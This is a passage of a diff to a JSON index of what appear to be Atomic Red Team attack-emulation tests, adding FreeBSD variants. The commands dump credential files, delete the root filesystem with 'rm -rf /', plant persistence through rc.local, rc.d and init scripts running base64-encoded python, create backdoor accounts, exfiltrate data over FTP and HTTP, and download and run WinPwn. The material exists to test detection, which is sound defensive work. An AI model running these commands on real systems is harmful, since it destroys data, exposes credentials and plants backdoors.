/etc/passwd and /etc/shadow using ed\n", + "description": "Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed\n", "supported_platforms": [ "linux" ], @@ -597311,16 +599049,16 @@ } }, "executor": { - "command": "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > #{output_file}\n", + "command": "unamestr=$(uname)\nif [ \"$unamestr\" = 'Linux' ]; then echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > ${output_file}; elif [ \"$unamestr\" = 'FreeBSD' ]; then echo -e \"e /etc/passwd\\n,p\\ne /etc/master.passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > ${output_file}; fi\n", "cleanup_command": "rm -f #{output_file}\n", - "name": "bash", + "name": "sh", "elevation_required": true } }, { - "name": "Access /etc/{shadow,passwd} with shell builtins", + "name": "Access /etc/{shadow,passwd,master.passwd} with shell builtins", "auto_generated_guid": "f5aa6543-6cb2-4fae-b9c2-b96e14721713", - "description": "Dump /etc/passwd and /etc/shadow using bash builtins\n", + "description": "Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins\n", "supported_platforms": [ "linux" ], @@ -597332,9 +599070,9 @@ } }, "executor": { - "command": "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > #{output_file}\ntestcat /etc/shadow > #{output_file}\n", + "command": "testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }\n[ \"$(uname)\" = 'FreeBSD' ] && testcat /etc/master.passwd\ntestcat /etc/passwd\ntestcat /etc/shadow\n", "cleanup_command": "rm -f #{output_file}\n", - "name": "bash", + "name": "sh", "elevation_required": true } } @@ -606740,7 +608478,7 @@ } }, { - "name": "macOS/Linux - Overwrite file with DD", + "name": "FreeBSD/macOS/Linux - Overwrite file with DD", "auto_generated_guid": "38deee99-fd65-4031-bec8-bfa4f9f26146", "description": "Overwrites and deletes a file using DD.\nTo stop the test, break the command with CTRL/CMD+C.\n", "supported_platforms": [ @@ -606761,7 +608499,7 @@ }, "executor": { "command": "dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes\n", - "name": "bash" + "name": "sh" } }, { @@ -611478,6 +613216,7 @@ "Remove-Item -path $env:TEMP\\deleteme_T1551.004\n", "Remove-Item -Path $env:TEMP\\deleteme_folder_T1551.004 -Recurse\n", "rm -rf / --no-preserve-root > /dev/null 2> /dev/null\n", + "chflags -R 0 /\nrm -rf / > /dev/null 2> /dev/null\n", "Remove-Item -Path (Join-Path \"$Env:SystemRoot\\prefetch\\\" (Get-ChildItem -Path \"$Env:SystemRoot\\prefetch\\*.pf\" -Name)[0])\n", "New-Item -Path $env:TEMP\\TeamViewer_54.log -Force | Out-Null\nRemove-Item $env:TEMP\\TeamViewer_54.log -Force -ErrorAction Ignore\n", "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n", @@ -611495,7 +613234,7 @@ "display_name": "Indicator Removal on Host: File Deletion", "atomic_tests": [ { - "name": "Delete a single file - Linux/macOS", + "name": "Delete a single file - FreeBSD/Linux/macOS", "auto_generated_guid": "562d737f-2fc6-4b09-8c2a-7f8ff0828480", "description": "Delete a single file from the temporary directory\n", "supported_platforms": [ @@ -611529,7 +613268,7 @@ } }, { - "name": "Delete an entire folder - Linux/macOS", + "name": "Delete an entire folder - FreeBSD/Linux/macOS", "auto_generated_guid": "a415f17e-ce8d-4ce2-a8b4-83b674e7017e", "description": "Recursively delete the temporary directory and all files contained within it\n", "supported_platforms": [ @@ -611695,6 +613434,18 @@ "name": "bash" } }, + { + "name": "Delete Filesystem - FreeBSD", + "auto_generated_guid": "b5aaca7e-a48f-4f1b-8f0f-a27b8f516608", + "description": "This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "chflags -R 0 /\nrm -rf / > /dev/null 2> /dev/null\n", + "name": "sh" + } + }, { "name": "Delete Prefetch File", "auto_generated_guid": "36f96049-0ad7-4a5f-8418-460acaeb92fb", @@ -619930,7 +621681,7 @@ "command_list": [ "sudo echo osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"' >> /etc/rc.common\n", "filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.common\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\\\"\" | sudo tee -a /etc/rc.common\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.common\nsudo chmod +x /etc/rc.common\n", - "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n" + "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\n[ \"$(uname)\" = 'FreeBSD' ] && alias python3=python3.9 && printf '#\\!/usr/local/bin/bash' | sudo tee /etc/rc.local || printf '#!/bin/bash' | sudo tee /etc/rc.local\necho \"\\npython3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n" ], "commands": [], "queries": [], @@ -619977,9 +621728,9 @@ "linux" ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": true, - "command": "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n", + "command": "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\n[ \"$(uname)\" = 'FreeBSD' ] && alias python3=python3.9 && printf '#\\!/usr/local/bin/bash' | sudo tee /etc/rc.local || printf '#!/bin/bash' | sudo tee /etc/rc.local\necho \"\\npython3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n", "cleanup_command": "origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi\n" } } @@ -625326,6 +627077,7 @@ ], "command_list": [ "echo \"[Unit]\" > /etc/systemd/system/art-systemd-service.service\necho \"Description=Atomic Red Team Systemd Service\" >> /etc/systemd/system/art-systemd-service.service\necho \"\" >> /etc/systemd/system/art-systemd-service.service\necho \"[Service]\" >> /etc/systemd/system/art-systemd-service.service\necho \"Type=simple\"\necho \"ExecStart=/bin/touch /tmp/art-systemd-execstart-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecStartPre=/bin/touch /tmp/art-systemd-execstartpre-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecStartPost=/bin/touch /tmp/art-systemd-execstartpost-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecReload=/bin/touch /tmp/art-systemd-execreload-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecStop=/bin/touch /tmp/art-systemd-execstop-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecStopPost=/bin/touch /tmp/art-systemd-execstoppost-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"\" >> /etc/systemd/system/art-systemd-service.service\necho \"[Install]\" >> /etc/systemd/system/art-systemd-service.service\necho \"WantedBy=default.target\" >> /etc/systemd/system/art-systemd-service.service\nsystemctl daemon-reload\nsystemctl enable art-systemd-service.service\nsystemctl start art-systemd-service.service\n", + "echo '#\\!/bin/sh' > /usr/local/etc/rc.d/art-test\necho ' ' >> /usr/local/etc/rc.d/art-test\necho '#' >> /usr/local/etc/rc.d/art-test\necho '# PROVIDE: art-test' >> /usr/local/etc/rc.d/art-test\necho '# REQUIRE: LOGIN' >> /usr/local/etc/rc.d/art-test\necho '# KEYWORD: shutdown' >> /usr/local/etc/rc.d/art-test\necho ' ' >> /usr/local/etc/rc.d/art-test\necho '. /etc/rc.subr' >> /usr/local/etc/rc.d/art-test\necho ' ' >> /usr/local/etc/rc.d/art-test\necho 'name=\"art_test\"' >> /usr/local/etc/rc.d/art-test\necho 'rcvar=art_test_enable' >> /usr/local/etc/rc.d/art-test\necho 'load_rc_config ${name}' >> /usr/local/etc/rc.d/art-test\necho 'command=\"/usr/bin/touch\"' >> /usr/local/etc/rc.d/art-test\necho 'start_cmd=\"art_test_start\"' >> /usr/local/etc/rc.d/art-test\necho '' >> /usr/local/etc/rc.d/art-test\necho 'art_test_start()' >> /usr/local/etc/rc.d/art-test \necho '{' >> /usr/local/etc/rc.d/art-test\necho ' ${command} /tmp/art-test.marker' >> /usr/local/etc/rc.d/art-test\necho '}' >> /usr/local/etc/rc.d/art-test\necho ' ' >> /usr/local/etc/rc.d/art-test \necho 'run_rc_command \"$1\"' >> /usr/local/etc/rc.d/art-test\nchmod +x /usr/local/etc/rc.d/art-test\nservice art-test enable\nservice art-test start\n", "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl restart T1543.002\n" ], "commands": [], @@ -625333,10 +627085,10 @@ "parsed_datasets": [ { "source": "atomics/T1543.002/T1543.002.yaml", - "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service", + "name": "Atomic Red Team Test - Create or Modify System Process: SysV/Systemd Service", "content": { "attack_technique": "T1543.002", - "display_name": "Create or Modify System Process: Systemd Service", + "display_name": "Create or Modify System Process: SysV/Systemd Service", "atomic_tests": [ { "name": "Create Systemd Service", @@ -625393,6 +627145,31 @@ "name": "bash" } }, + { + "name": "Create SysV Service", + "auto_generated_guid": "760fe8d2-79d9-494f-905e-a239a3df86f6", + "description": "This test creates a SysV service unit file and enables it as a service.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "rc_service_path": { + "description": "Path to rc service file", + "type": "path", + "default": "/usr/local/etc/rc.d" + }, + "rc_service_file": { + "description": "File name of rc service file", + "type": "string", + "default": "art-test" + } + }, + "executor": { + "command": "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho '# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '# REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD: shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho '. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho 'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable' >> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}' >> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"' >> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"' >> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho 'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{' >> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker' >> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command \"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice art-test enable\nservice art-test start\n", + "cleanup_command": "sysrc -x art_test_enable\nrm -f #{rc_service_path}/#{rc_service_file}\n", + "name": "sh" + } + }, { "name": "Create Systemd Service file, Enable the service , Modify and Reload the service.", "auto_generated_guid": "c35ac4a8-19de-43af-b9f8-755da7e89c89", @@ -629902,6 +631679,7 @@ "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -sc dclist\n", "ip neighbour show\n", "ip route show\n", + "netstat -r | grep default\n", "ip tcp_metrics show |grep --invert-match \"^127\\.\"\n", "$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher(\"(ObjectCategory=Computer)\")\n$DirectorySearcher.PropertiesToLoad.Add(\"Name\")\n$Computers = $DirectorySearcher.findall()\nforeach ($Computer in $Computers) {\n $Computer = $Computer.Properties.name\n if (!$Computer) { Continue }\n Write-Host $Computer}\n", "Get-AdComputer -Filter *\n", @@ -630298,6 +632076,18 @@ "name": "sh" } }, + { + "name": "Remote System Discovery - netstat", + "auto_generated_guid": "d2791d72-b67f-4615-814f-ec824a91f514", + "description": "Use the netstat command to display the kernels routing tables.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "netstat -r | grep default\n", + "name": "sh" + } + }, { "name": "Remote System Discovery - ip tcp_metrics", "auto_generated_guid": "6c2da894-0b57-43cb-87af-46ea3b501388", @@ -633797,7 +635587,7 @@ { "name": "Port Scan Nmap", "auto_generated_guid": "515942b0-a09f-4163-a7bb-22fefb6f185f", - "description": "Scan ports to check for listening ports with Nmap.\n\nUpon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.\n", + "description": "Scan ports to check for listening ports with Nmap.\nUpon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.\n", "supported_platforms": [ "linux", "macos" @@ -633824,12 +635614,12 @@ { "description": "Check if nmap command exists on the machine\n", "prereq_command": "if [ -x \"$(command -v nmap)\" ]; then exit 0; else exit 1; fi;\n", - "get_prereq_command": "(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" + "get_prereq_command": "(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)\n" }, { "description": "Check if nc command exists on the machine\n", "prereq_command": "if [ -x \"$(command -v nc)\" ]; then exit 0; else exit 1; fi;\n", - "get_prereq_command": "(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)\n" + "get_prereq_command": "(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)||(which pkg && pkg install -y netcat)\n" }, { "description": "Check if telnet command exists on the machine\n", @@ -636273,7 +638063,7 @@ } ], "command_list": [ - "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n" + "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n[ \"$(uname)\" = 'FreeBSD' ] && /bin/echo \"#\\!/bin/sh\" > \"testdirwithspaceend /init \" && echo 'echo \"print(\\\"running T1035.006 with space after filename to masquerade init\\\")\" | python3.9' >> \"testdirwithspaceend /init \" && echo \"exit\" >> \"testdirwithspaceend /init \" || /usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n" ], "commands": [], "queries": [], @@ -636306,8 +638096,8 @@ "linux" ], "executor": { - "name": "bash", - "command": "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n", + "name": "sh", + "command": "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n[ \"$(uname)\" = 'FreeBSD' ] && /bin/echo \"#\\!/bin/sh\" > \"testdirwithspaceend /init \" && echo 'echo \"print(\\\"running T1035.006 with space after filename to masquerade init\\\")\" | python3.9' >> \"testdirwithspaceend /init \" && echo \"exit\" >> \"testdirwithspaceend /init \" || /usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n", "cleanup_command": "rm -rf /tmp/atomic-test-T1036.006" } } @@ -639637,9 +641427,18 @@ "default": "victim" } }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "rsync must be installed on the machine \n", + "prereq_command": "if [ -x \"$(command -v rsync)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "(pkg install -y rsync)||(sudo apt-get -y install rsync)\n" + } + ], "executor": { "command": "rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}\n", - "name": "bash" + "name": "sh", + "elevation_required": true } }, { @@ -639672,9 +641471,17 @@ "default": "adversary" } }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "rsync must be installed on the machine \n", + "prereq_command": "if [ -x \"$(command -v rsync)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "(pkg install -y rsync)||(sudo apt-get -y install rsync)\n" + } + ], "executor": { "command": "rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}\n", - "name": "bash" + "name": "sh" } }, { @@ -639709,7 +641516,7 @@ }, "executor": { "command": "scp #{local_file} #{username}@#{remote_host}:#{remote_path}\n", - "name": "bash" + "name": "sh" } }, { @@ -639744,7 +641551,7 @@ }, "executor": { "command": "scp #{username}@#{remote_host}:#{remote_file} #{local_path}\n", - "name": "bash" + "name": "sh" } }, { @@ -639779,7 +641586,7 @@ }, "executor": { "command": "sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'\n", - "name": "bash" + "name": "sh" } }, { @@ -639814,7 +641621,7 @@ }, "executor": { "command": "sftp #{username}@#{remote_host}:#{remote_file} #{local_path}\n", - "name": "bash" + "name": "sh" } }, { @@ -671366,10 +673173,11 @@ } }, { - "name": "System Time Discovery in macOS", + "name": "System Time Discovery in FreeBSD/macOS", "auto_generated_guid": "f449c933-0891-407f-821e-7916a21a1a6f", "description": "Identify system time. Upon execution, the local computer system time and timezone will be displayed. \n", "supported_platforms": [ + "linux", "macos" ], "executor": { @@ -671935,12 +673743,12 @@ "dependencies": [ { "description": "The `at` and `atd` executables must exist in the PATH\n", - "prereq_command": "which at && which atd\n", + "prereq_command": "if [ \"$(uname)\" = 'FreeBSD' ]; then which at; else which at && which atd; fi;\n", "get_prereq_command": "echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'\n" }, { "description": "The `atd` daemon must be running\n", - "prereq_command": "systemctl status atd || service atd status\n", + "prereq_command": "if [ $(uname) = 'Linux' ]; then systemctl status atd || service atd status; fi;\n", "get_prereq_command": "echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'\n" } ], @@ -681767,8 +683575,8 @@ "auto_generated_guid": "0ac21132-4485-4212-a681-349e8a6637cd", "description": "Enable traffic redirection.\n\nNote that this test may conflict with pre-existing system configuration.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "proxy_server": { @@ -688520,7 +690328,7 @@ "Send-MailMessage -From test@corp.com -To test@corp.com -Subject \"T1048.003 Atomic Test\" -Attachments C:\\Windows\\System32\\notepad.exe -SmtpServer 127.0.0.1\n", "$Dir_to_copy = \"$env:windir\\temp\"\n$ftp = \"ftp://127.0.0.1/\"\n$web_client = New-Object System.Net.WebClient\n$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')\nif (test-connection -count 1 -computername \"127.0.0.1\" -quiet)\n{foreach($file in (dir $Dir_to_copy \"*.7z\"))\n{echo \"Uploading $file...\"\n$uri = New-Object System.Uri($ftp+$file.name)\n$web_client.UploadFile($uri, $file.FullName)}}\nelse\n{echo \"FTP Server Unreachable. Please verify the server address in input args and try again.\"}\n", "$rclone_bin = Get-ChildItem C:\\Users\\Public\\Downloads\\ -Recurse -Include \"rclone.exe\" | Select-Object -ExpandProperty FullName\n$exfil_pack = Get-ChildItem C:\\Users\\Public\\Downloads\\ -Recurse -Include \"exfil.zip\" | Select-Object -ExpandProperty FullName\n&$rclone_bin config create ftpserver \"ftp\" \"host\" ftp.dlptest.com \"port\" 21 \"user\" dlpuser \"pass\" rNrKYTX9g7z3RgJRmxWuGHbeu\n&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate", - "if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi\n", + "[ \"$(uname)\" = 'FreeBSD' ] && alias python3=python3.9\nif [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi\n", "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -T #{host.dir.compress} ftp://#{ftp.server.address}/$RemoteName --user #{ftp.user.name}:'#{ftp.user.password}'\n", "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$ftp = [System.Net.FtpWebRequest]::Create(\"ftp://#{ftp.server.address}/$RemoteName\");\n$ftp = [System.Net.FTPWebRequest]$ftp;\n$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;\n$ftp.Credentials = New-Object System.Net.NetworkCredential(\"#{ftp.user.name}\", \"#{ftp.user.password}\");\n$ftp.UseBinary = $true;\n$ftp.UsePassive = $true;\n\n$content = [System.IO.File]::ReadAllBytes(\"#{host.dir.compress}\");\n$ftp.ContentLength = $content.Length;\n$requestStream = $ftp.GetRequestStream();\n$requestStream.Write($content, 0, $content.Length);\n\n$requestStream.Close();\n$requestStream.Dispose();\n" ], @@ -688537,7 +690345,7 @@ { "name": "Exfiltration Over Alternative Protocol - HTTP", "auto_generated_guid": "1d1abbd6-a3d3-4b2e-bef5-c59293f46eff", - "description": "A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.\n\nUpon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.\n", + "description": "A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltration on port 1337.\n\nUpon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.\n", "supported_platforms": [ "macos", "linux" @@ -688729,7 +690537,7 @@ "executor": { "name": "sh", "elevation_required": false, - "command": "if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi\n" + "command": "[ \"$(uname)\" = 'FreeBSD' ] && alias python3=python3.9\nif [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi\n" } } ] @@ -692267,8 +694075,11 @@ "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nobfuskittiedump -consoleoutput -noninteractive", "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsafedump -consoleoutput -noninteractive", "useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art\nsu art\nwhoami\nexit\n", + "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n", "useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art\nusermod --lock art\nusermod --expiredate \"1\" art\nusermod --unlock art\nusermod --expiredate \"99999\" art\nsu art\nwhoami\nexit\n", - "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nchsh --shell /bin/bash nobody\nusermod --password $(openssl passwd -1 nobody) nobody\nsu nobody\nwhoami\nexit\n" + "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user testuser1 -h 0\npw lock art\npw usermod art -e +1d\npw unlock art\npw user mod art -e +99d\nsu art\nwhoami\nexit\n", + "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nchsh --shell /bin/bash nobody\nusermod --password $(openssl passwd -1 nobody) nobody\nsu nobody\nwhoami\nexit\n", + "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" ], "commands": [], "queries": [], 